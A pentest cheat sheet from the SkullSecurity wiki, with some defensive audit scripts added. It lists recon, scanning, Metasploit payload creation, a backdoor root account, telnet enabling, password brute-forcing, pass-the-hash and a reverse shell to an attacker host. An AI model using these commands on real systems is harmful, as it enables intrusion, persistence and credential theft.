Difference between revisions of "Linux Commands"

From SkullSecurity
Latest revision as of 09:11, 21 January 2011

Recon

whois

$ whois [-h whois_server] name

nslookup

$ nslookup <target>

dig

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
$ dig [@server] <name> [type]
  • Zone transfer
$ dig [@server] <domain> -t AXFR
  • Iterative zone transfer
$ dig [@server] <domain> -t IXFR=<N>

BiLE.pl

$ ./BiLE <target> <result_file>
$ ./BiLE-weigh.pl <site_of_interest> <BiLE_output.mine>
$ ./tld-expand.pl
$ ./vet-IPrange.pl
$ ./qtrace.pl

snmpwalk

Dump the ARP table of an snmp server at HOST

$ snmpwalk -v 2c -c <community> <server> ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump

Scanning

tcpdump

Parameters

  • -n -- use numbers
  • -i <interface>
  • -v -- be verbose
  • -r <file>/-w <file> -- read from/write to file
  • -x -- print hex
  • -A -- print ASCII
  • -X -- print hex and ASCII
  • -s <snaplen> -- length to capture (-s0 for all data)

Filter string

  • Protocol
    • ether, ip, ip6, arp, rarp, tcp, udp
  • Type
    • host <host>
    • net <network>
    • port <portnum>
    • portrange <start-end>
  • Direction
    • src
    • dst
  • Logic
    • and
    • or
  • Show TCP against target 10.10.10.10 in ASCII
tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10
  • Show all UDP from 10.10.10.10
tcpdump [-i tap0] -n udp and src 10.10.10.10
  • Show all TCP port 80 packets going to or from host 10.10.10.10
tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10

hping3

TCP Flags

  • --syn, --fin, --rst, --push, --ack, --urg

Target selection

  • --rand-dest
  • --interface <int>

Source selection

  • --spoof <hostname>
  • --rand-source

Port selection

  • --destport <port>
  • --destport +<port> -- increment by one for each packet received
  • --destport ++<port> -- increment by one for each packet sent
  • --scan <portrange>
  • --baseport <port>
  • --keep -- don't increment the source port

Speed options

  • --fast, --faster, --flood
  • --interval <N> -- interval in seconds
  • --interval u<N> -- interval in microseconds

Other options

  • --count <N>
  • --beep
  • --file <filename>
  • --data <N>

traceroute

Parameters

  • -f <N> -- Initial TTL
  • -g <hostlist> -- Loose source route
  • -I -- use ICMP Echo instead of UDP
  • -m <N> -- maximum number of hops (default 30)
  • -n -- numeric
  • -p <baseport> -- set the base UDP port
  • -w <N> -- wait N seconds (default 5)

Layer Four Traceroute (lft)

http://pwhois.org/lft/index.who

Options

  • -u -- use UDP
  • -p -- use ICMP echo
  • -d <port> -- destination port (default 80)
  • -s <port> -- source port
  • -L <N> -- length (including layer 3/4 header)
  • -A -- look up AS number
  • -P -- traceroute via tcp

nmap

Pinging

  • -PN -- don't ping
  • -PB -- default, ICMP Echo + TCP to port 80
  • -PE -- ICMP Echo request
  • -PS[portlist] -- TCP SYN
  • -PP -- ICMP Timestamp request
  • -PM -- ICMP Address Mask request
  • -PR -- default on subnet, use ARP to identify hosts

Scanning

  • -sT -- TCP Connect scan
  • -sS -- SYN scan
  • -sA -- ACK scan
  • -sF -- FIN scan
  • -sN -- Null scan
  • -sX -- Xmas Tree scan
  • -sM -- Maimon scan
  • --scanflags specify your own flags
  • -sU -- UDP scan

Fingerprinting

  • -O -- OS fingerprint
  • -sV -- Version scan

Scripts

  • -sC -- run all scripts
  • --script=<category,dir,src,etc>
  • --script-trace

Timing

  • --paranoid, --sneaky, --polite, --normal, --aggressive, --insane
  • --host-timeout, --max-rtt-timeout, --min-rtt-timeout, --initial-rtt-timeout, --max-parallelism, --scan-delay

Other options

  • -p<ports>
  • -F -- fast (checks only ports in nmap-services)
  • --packet-trace
  • --traceroute
  • --badsum

THC amap

Options

  • -q -- quiet (omit closed ports)
  • -v -- verbose
  • -b -- print banners

Example:

amap -bqv 10.10.10.10 1-50

Enumerating users

Commands

$ cat /etc/passwd
$ finger
$ who
$ w

Remotely:

$ finger @<target>

Exploitation

netcat

Options

  • -l -- listen mode
  • -L -- listen harder (Windows only)
  • -u -- UDP mode
  • -p -- local port (in listen mode, the port to listen on)
  • -e -- program to execute
  • -n -- don't resolve names
  • -z -- don't send any data
  • -w<N> -- timeout for connects
  • -v/-vv -- be verbose

Scanning

echo "" | nc -v -n -w1 <target> <port-range>

Setting up a relay

mknod backpipe p
nc -l -p <allowed_port> < backpipe | nc <host> <port> > backpipe

Relaying port 22 to the local system

mknod backpipe p
nc -l -p <allowed_port> < backpipe | nc localhost 22 > backpipe

Finding SetUID/SetGID programs

find / -type f \( -perm -4000 -o -perm -2000 \) -print
find /bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done
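
The find commands above give a one-off listing; what a defender wants is to know when that listing changes. The script below is an added example (it is not from the SkullSecurity page) that saves the set-UID/set-GID list as a baseline and later diffs the live list against it, so a newly dropped privileged binary is reported. The directory layout and file names in demo() are constructed for illustration; the baseline path is an assumed argument.

```shell
#!/bin/sh
# Added example, not from the SkullSecurity page: baseline the set-UID/set-GID
# files under a directory and report any that appear later.

# Print every regular file under $1 carrying the set-UID or set-GID bit,
# one path per line, sorted so two runs can be compared with comm/diff.
# -xdev keeps find on one filesystem; errors (unreadable dirs) are discarded.
list_privileged() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Save the current listing for $1 as the baseline file $2.
save_baseline() {
    list_privileged "$1" > "$2"
}

# Report files that are privileged now but were absent from baseline $2.
# Prints the new paths and returns 1 when any were found, 0 otherwise.
check_against_baseline() {
    new=$(list_privileged "$1" | comm -13 "$2" -)
    if [ -n "$new" ]; then
        printf 'new set-UID/set-GID files:\n%s\n' "$new"
        return 1
    fi
    return 0
}

# Self-contained demonstration on a constructed directory tree (assumed
# layout, not a real system): baseline, then "drop" a new set-GID file.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/bin"
    printf '#!/bin/sh\n' > "$tmp/bin/legit";   chmod 4755 "$tmp/bin/legit"
    printf '#!/bin/sh\n' > "$tmp/bin/plain";   chmod 0755 "$tmp/bin/plain"
    save_baseline "$tmp" "$tmp/baseline.txt"
    printf '#!/bin/sh\n' > "$tmp/bin/dropped"; chmod 2755 "$tmp/bin/dropped"
    check_against_baseline "$tmp" "$tmp/baseline.txt"
    rc=$?
    rm -rf "$tmp"
    return $rc
}
```

Run `save_baseline / /var/lib/suid-baseline.txt` once on a known-good host and `check_against_baseline / /var/lib/suid-baseline.txt` from cron; a non-zero exit is the alert. Keep the baseline file somewhere the audited system cannot silently rewrite it.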

Metasploit

Running an exploit

msf> show exploits
msf> use exploit/windows/smb/ms05_039_pnp
msf> show payloads
msf> set PAYLOAD windows/shell/bind_tcp
msf> show options
msf> set RHOST 10.10.10.10
msf> exploit

Interacting with sessions

msf> sessions -l
msf> sessions -i <N>

Creating a malicious VBScript

$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> V
$ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y V

Creating a malicious Exe

$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> X
$ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y X

Example autorun.inf file to run a malicious exe (goes with Metasploit)

[autorun]
open=example.exe
icon=example.exe

Metasploit listener

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=<lhost> E
$ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y E

Meterpreter

Filesystem commands

> cd
> lcd
> pwd / getwd
> ls
> cat
> download / upload
> mkdir / rmdir
> edit
> getpid
> getuid
> ps
> kill
> execute
> migrate
> ipconfig
> portfwd
> route
> idletime
> uictl <enable/disable> <keyboard/mouse>

Modules

> use <modulename>
> use priv
> hashdump
> timestomp

Creating a user

Adding an ordinary user

useradd <name>

Adding a root user (note: a non-uid-0 account may be required to log in)

useradd -o -u 0 <name>
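
The useradd -o -u 0 line creates a second account with root's UID, which is easy to miss in a long passwd file. The script below is an added example (not from the SkullSecurity page) that audits a passwd-format file for exactly that: any account other than root with UID 0, plus any UID shared by more than one account. The passwd content in demo() is constructed; audit_system() assumes the usual /etc/passwd location.

```shell
#!/bin/sh
# Added example, not from the SkullSecurity page: find accounts that share
# UID 0 with root (what "useradd -o -u 0 <name>" produces) and other reused UIDs.

# Print every account in passwd file $1 with UID 0 whose name is not "root".
# Returns 1 if at least one such account exists, 0 otherwise.
find_extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1; found = 1 }
             END { exit found ? 1 : 0 }' "$1"
}

# Print "UID: name1,name2" for every UID used by more than one account.
find_duplicate_uids() {
    awk -F: '{ if ($3 in names) names[$3] = names[$3] "," $1; else names[$3] = $1
               count[$3]++ }
             END { for (u in count) if (count[u] > 1) print u ": " names[u] }' "$1" | sort
}

# Live-system wrapper (assumes /etc/passwd); exit status 1 means a finding.
audit_system() {
    find_extra_uid0 /etc/passwd
}

# Demonstration on a constructed passwd file containing a "toor" backdoor
# account and an unrelated UID collision between alice and bob.
demo() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0::/root:/bin/bash
bob:x:1000:1001:Bob:/home/bob:/bin/bash
EOF
    echo "accounts sharing UID 0 with root:"
    find_extra_uid0 "$f" || true
    echo "reused UIDs:"
    find_duplicate_uids "$f"
    rm -f "$f"
}
```

On the constructed file the first function prints toor and the second prints 0: root,toor and 1000: alice,bob. Pair this with the set-UID baseline check: both are cheap to run from cron and both catch the persistence steps this page describes.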

telnet

Checking for inetd/xinetd

ps aux | grep inetd

Adding telnet to /etc/inetd.conf

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

Adding telnet to xinetd

  • Steal the file from a service that's running (files are in /etc/xinetd.d)
  • Change server to "/usr/sbin/in.telnetd"

Restarting inetd/xinetd (the "kill" command with the PID can also be used)

killall -HUP inetd
killall -HUP xinetd
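
Both ways of enabling telnet shown above leave a trace in a config file, so they can be audited. The script below is an added example (not from the SkullSecurity page) that reports active telnetd entries: uncommented inetd.conf lines that launch in.telnetd, and xinetd.d service blocks whose server is a telnetd binary and that are not set to disable = yes. The file contents used in the demonstration are constructed; the two functions take the paths as arguments rather than assuming /etc.

```shell
#!/bin/sh
# Added example, not from the SkullSecurity page: detect telnet enabled
# through inetd.conf or an xinetd.d service file.

# Print active (uncommented) lines of inetd.conf $1 that run in.telnetd.
# Prints nothing and succeeds when there are none.
audit_inetd_conf() {
    grep -E '^[^#]*[[:space:]]in\.telnetd' "$1" 2>/dev/null || true
}

# Walk xinetd.d directory $1 and report every service block whose "server"
# contains "telnetd" and that is not explicitly disabled.
audit_xinetd_dir() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        awk -v file="$f" '
            # a new block resets the state
            /^[[:space:]]*service[[:space:]]/ { svc = $2; disabled = 0; server = "" }
            # "disable = yes" marks the block inactive
            /^[[:space:]]*disable[[:space:]]*=/ {
                v = $0; sub(/^[^=]*=[[:space:]]*/, "", v); sub(/[[:space:]]+$/, "", v)
                if (v == "yes") disabled = 1
            }
            # "server = /path" (server_args does not match: "_" follows "server")
            /^[[:space:]]*server[[:space:]]*=/ {
                v = $0; sub(/^[^=]*=[[:space:]]*/, "", v); sub(/[[:space:]]+$/, "", v)
                server = v
            }
            # closing brace: evaluate the finished block
            /^[[:space:]]*}/ { if (!disabled && server ~ /telnetd/) print file ": service " svc " runs " server }
        ' "$f"
    done
}

# Demonstration on constructed files: one commented-out and one live inetd
# line, a properly disabled xinetd telnet block, and a "daytime" block whose
# server was swapped for in.telnetd the way the page describes.
demo() {
    d=$(mktemp -d)
    printf '#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd\ntelnet stream tcp nowait root /usr/sbin/tcpd in.telnetd\n' > "$d/inetd.conf"
    mkdir "$d/xinetd.d"
    printf 'service telnet\n{\n\tserver = /usr/sbin/in.telnetd\n\tdisable = yes\n}\n' > "$d/xinetd.d/telnet"
    printf 'service daytime\n{\n\tserver = /usr/sbin/in.telnetd\n\tdisable = no\n}\n' > "$d/xinetd.d/daytime"
    audit_inetd_conf "$d/inetd.conf"
    audit_xinetd_dir "$d/xinetd.d"
    rm -rf "$d"
}
```

On a real host run audit_inetd_conf /etc/inetd.conf and audit_xinetd_dir /etc/xinetd.d; any output is a finding. The xinetd check keys on the server binary rather than the service name because, as the page notes, the block is usually copied from an unrelated service.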

sshd

File should be in /etc/rc*. Ways to enable:

chkconfig sshd on
service sshd start
/etc/init.d/sshd start

Passwords

Dictionaries

Creating a dictionary

cat wordlist.txt | sort | uniq > dictionary.txt

Scraping a Web site

mkdir /tmp/source
cd /tmp/source
wget -r -l <N> <target>
cd ..
grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort | uniq > wordlist.lst

Or, just use my dictionaries

Account lockout

grep tally /etc/pam.d/*
grep tally /etc/pam.conf

pw-inspector

Options

  • -i -- input file
  • -o -- output file
  • -m <N> -- minimum length
  • -M <N> -- maximum length
  • -c <N> -- the number of criteria
    • -l -- lower case
    • -u -- upper case
    • -n -- numbers
    • -p -- printable characters (lower/upper/num)
    • -s -- special characters (all others)

Example

cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2
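
To make the selection rule behind the -m/-M/-c flags explicit, here is an added example (not from the SkullSecurity page and not pw-inspector's own code) that reproduces the same filter in awk: a line survives if its length is within bounds and it contains at least NEED of the requested character classes. The -p (printable) criterion is left out; the sample list in demo() is constructed.

```shell
#!/bin/sh
# Added example, not from the SkullSecurity page: awk re-implementation of
# pw-inspector's length and character-class policy filter.
#
# usage: filter_passwords MIN MAX NEED CLASSES < list
#   MIN/MAX  length bounds (MAX 0 = no upper bound), like -m / -M
#   NEED     how many of the requested classes a line must contain, like -c
#   CLASSES  any of l u n s (lower, upper, number, special), like -l -u -n -s
filter_passwords() {
    awk -v min="$1" -v max="$2" -v need="$3" -v classes="$4" '
        # length bounds first: lines outside them are dropped outright
        length($0) < min || (max > 0 && length($0) > max) { next }
        {
            met = 0
            if (index(classes, "l") && $0 ~ /[[:lower:]]/) met++
            if (index(classes, "u") && $0 ~ /[[:upper:]]/) met++
            if (index(classes, "n") && $0 ~ /[[:digit:]]/) met++
            if (index(classes, "s") && $0 ~ /[^[:alnum:]]/) met++
            if (met >= need) print
        }'
}

# Same policy as the page's "pw-inspector -m 6 -n -u -l -c 2", applied to a
# constructed list: only Password1, ABCDEF12 and pa$$w0rd pass.
demo() {
    printf '%s\n' abc password Password1 abcdef ABCDEF12 '!!!!!!' 'pa$$w0rd' |
        filter_passwords 6 0 2 lun
}
```

The same function doubles as a cheap policy check on the defensive side: feed it a proposed password list with the organisation's minimum length and class count and anything it prints is acceptable, anything it drops is not.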

Hydra

Options

  • -l <username>/-L <userfile> -- Login name/file
  • -p <password>/-P <passfile> -- Password/file
  • -e <n|s|ns> -- extended checks (n = null, s = same as username)
  • -t <N> -- thread count

hydra <host> <protocol> <-l <username>|-L <userfile>> <-p <password>|-P <passfile>> [-e <n|s|ns>] [-t <threads>]

smb password

hydra <host> smb -l george -P ./list.lst -e ns

ssh password

hydra <host> ssh2 -l george -P ./list.lst -e ns

John

Show cracked passwords

john --show <passwordfile>

Speed test

john --test

Running against a password file

john <passwordfile>

Specifying the hash type

john --format=<format> <passwordfile>
john --format=nt /tmp/pwdump

Combining passwd/shadow

unshadow <passwdfile> <shadowfile> > combined.txt
john combined.txt

Modified Samba

Loading the hash

export SMBHASH="<LANMAN>:<NT>"
echo $SMBHASH

Mounting a drive

./smbmount //<target>/<share> <mountpoint> -o username=<username>
./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator

Adding a user

./net user ADD <username> <password> -I <target> -U <admin_username>
./net rpc group ADDMEM administrators <username> -I <target> -U <admin_username>

Web

nikto.pl

Scanning

nikto.pl -h <host>

Updating

nikto.pl -update

Single check

nikto.pl -Single

Fancy tricks

Double-telnet

On the attacker machine

nc -l -p 4444
nc -l -p 5555

On the victim machine

telnet <attacker> 4444 | cmd.exe | telnet <attacker> 5555